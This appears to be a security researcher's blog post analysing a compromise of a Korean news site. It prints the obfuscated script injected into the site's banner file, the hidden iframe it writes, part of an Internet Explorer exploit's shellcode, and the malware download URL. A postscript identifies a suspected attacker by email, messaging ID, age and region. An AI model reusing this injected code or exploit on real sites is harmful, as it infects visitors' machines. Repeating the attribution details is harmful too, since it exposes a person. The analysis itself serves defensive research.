Sometimes it's tricky, because nowadays more and more drive-by downloads try to hide themselves by disguising as coming from ad servers.
Here's an example. Recently our scanners reported that betanews.net, a Korean news website ranking 671 in Korea, was serving live drive-by downloads.
Well, it indeed is, as we write.
In its index page, www.betanews.net contains the following javascript, which displays ad banners:
<script type="text/javascript" src="/js/banner.js"></script>
/js/banner.js was compromised and the following malicious script was inserted at the end of the file:
if(document.cookie.indexOf('xxoo')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='xxoo=Yes;path=/;expires='+expires.toGMTString;document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%64%2E%69%6C%69%6B%65%63%31%69%63%6B%2E%63%6F%6D%2F%61%64%2E%61%73%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E"));}
Which, after decoding,writes the following:
<iframe src="http://ad.ilikec1ick.com/ad.asp" width=0 height=0></iframe>
This "ilikec1ick.com" domain apparently tries to resemble "ilikeclick.com", which is a Korean ad network:
http://ad.ilikec1ick.com/ad.asp contains the javascript exploit:
<script>
document.write("<bu"+"tton i"+"d='mon' o"+"ncl"+"ick"+"='sc"+"lick();' S"+"TYLE='DISP"+"LAY"+":NONE'></b"+"utton>");
var eLFGhbswV="%x9090%";var ZyOWqionK="x9090%x5858%x5858%x10EB%x4B5B";var LoLYVDGGQ="%xC933%xB966%x03B8%x3480";var cXbQEhvHS="%xBD0B%xFAE2%x05EB%xEBE8%";var UpiNKTfoo="xFFFF";var GIMIByGgI="%x54FF%xBEA3%xBDBD%xD9E2";var xsBZzgBPo="%x8D1C%";var lXOdHiLAV="xBDBD";var ZzEEOlPoD="%x36BD%xB1FD%xCD36%x1";var SbYhcedXP="0A1%xD53";var xngsAiUQI="6%x36B5%xD74A%xE4A";var KGhCigcMg="C%x0355%xBDBF%x";var iWWZubmWc="2DBD%x455F%x8ED5%x";var pefyOgmGu="BD8F%xD5BD%xCEE8%xCF";var kEqSfhtbi="D8%x36E9%xB1FB%x0";var AObPGCHfF="355%xBDBC%x36BD%xD755%xE4B";var
(omitted)
This is an iepeers (CVE-2010-0806) exploit; after successful exploitation, the browser downloads and executes http://weniz.co.kr/mall/updir/cs/pds.exe.
The exploit, ad.asp, triggers 7/32 on VirusTotal, and the malware, pds.exe, triggers 27/42.
OK, and so, is this a drive-by download attack, or a malvertising attack?
Very similar to the previous "adshufffle.com" malvertising incident, this incident also involves a malicious domain "ilikec1ick.com" which resembles "ilikeclick.com".
So should this be categorized as a malvertising incident? I would say no. I don't think the attacker registered ilikec1ick.com and then tricked betanews.net to take on his ad. I think in this case, he simply hacked into betanews.com and modified their banner.js file. However, in order to prolong the lifespan of this drive-by download operation, he's registered his malicious domain to resemble an ad network, hoping that this would reduce the chance of someone noticing something funny.
This is one of the challenges we currently face at generating malvertising statistics. Although malvertising, mass sql injections, mass hosting compromises, mass wordpress injections, and individual hacks such as this case, all often end up serving drive-by downloads (Web malware), the threats should be categorized differently from a "point of entry" standpoint. However, doing so requires quite some manual labor.
Wayne
PS: Last time we were able to identify the individual behind the "adshufffle.com" malvertising attack. Well, how about for this example? We attempted a try.
The domain ilikec1ick.com was registered on Jan 19th by "gxiboy@gmail.com". This fellow posted an ad (in Chinese) last month:
接单(拿SHELL 数据库 等等)
接单
地区:韩国 台湾 美国 等等(除国内)
类型:数据库(各种),webshell,渗透项目测试等等
要求:只接3000以上的单子 小单勿扰
找长期合作伙伴 无需定金,拿到后验证过付钱.
联系方式GT [email]Gxiboy@Gmail.com[/email] QQ:9 9 8 3 8 0 8
I'll translate it:
Hope to acquire projects (get shell, database, etc)
Region: Korea, Taiwan, US, etc, but no domestic targets (mainland China)
Scope of work: all types of databases, webshell, pentesting
Requirement: Fees start at no less than 450USD / project
Looking for long-term partnerships, no up-front payment required, pay after you get what you want.
And then there's his email and QQ. From his QQ, he's a 25-year-old male nicknamed "All night prince," and based out of China. I think he's based out of Guangdong because most of the websites that he operate, for example, ktdown.com and www.tianqiyugao.net, are all located in Guangdong.
The "services" that he offers matches with our speculation--that he broke into betanews.net and injected the drive-by iframe.
Read more (rest of article)...
